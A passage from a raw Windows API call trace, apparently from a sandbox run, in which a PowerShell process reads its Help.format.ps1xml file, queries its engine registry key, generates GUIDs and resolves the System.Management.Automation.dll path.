lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.261] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.261] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.262] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.262] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.262] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.265] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.265] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.266] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.266] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.266] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.266] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.266] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.266] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.266] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.267] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.267] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.267] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.267] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.267] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.267] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.267] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.268] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.268] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.268] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.268] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.268] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.268] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.269] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.269] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.269] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.269] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.269] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.269] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.270] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.270] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.270] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0xf37, lpOverlapped=0x0) returned 1 [0103.270] ReadFile (in: hFile=0x308, lpBuffer=0x3551cdf, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3551cdf*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.270] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0103.270] SetErrorMode (uMode=0x1) returned 0x1 [0103.270] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acce0 | out: lpFileInformation=0x1acce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0103.270] SetErrorMode (uMode=0x1) returned 0x1 [0103.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0103.271] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acdc8 | out: phkResult=0x1acdc8*=0x308) returned 0x0 [0103.271] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd4c, lpData=0x0, lpcbData=0x1acd48*=0x0 | out: lpType=0x1acd4c*=0x1, lpData=0x0, lpcbData=0x1acd48*=0x56) returned 0x0 [0103.271] CoTaskMemAlloc (cb=0x5a) returned 0x1b753fe0 [0103.271] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd1c, lpData=0x1b753fe0, lpcbData=0x1acd18*=0x56 | out: lpType=0x1acd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd18*=0x56) returned 0x0 [0103.271] CoTaskMemFree (pv=0x1b753fe0) [0103.271] RegCloseKey (hKey=0x308) returned 0x0 [0103.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0103.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0103.281] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x5976bacf, Data2=0xa71e, Data3=0x4612, Data4=([0]=0xa5, [1]=0x7a, [2]=0xa8, [3]=0xe2, [4]=0xeb, [5]=0x46, [6]=0xd7, [7]=0xe8))) returned 0x0 [0103.282] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xa0a544f0, Data2=0x9591, Data3=0x42e2, Data4=([0]=0x9a, [1]=0xa4, [2]=0x90, [3]=0xa2, [4]=0x5a, [5]=0xd9, [6]=0xbf, [7]=0x32))) returned 0x0 [0103.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.323] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x11525e85, Data2=0x3972, Data3=0x4a1c, Data4=([0]=0xb0, [1]=0xe9, [2]=0xb1, [3]=0xd7, [4]=0xf9, [5]=0xf0, [6]=0xf3, [7]=0xa6))) returned 0x0 [0103.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.328] VirtualQuery (in: lpAddress=0x1ab000, lpBuffer=0x1abec0, dwLength=0x30 | out: lpBuffer=0x1abec0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.329] VirtualQuery (in: lpAddress=0x1ab090, lpBuffer=0x1abf50, dwLength=0x30 | out: lpBuffer=0x1abf50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.331] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: 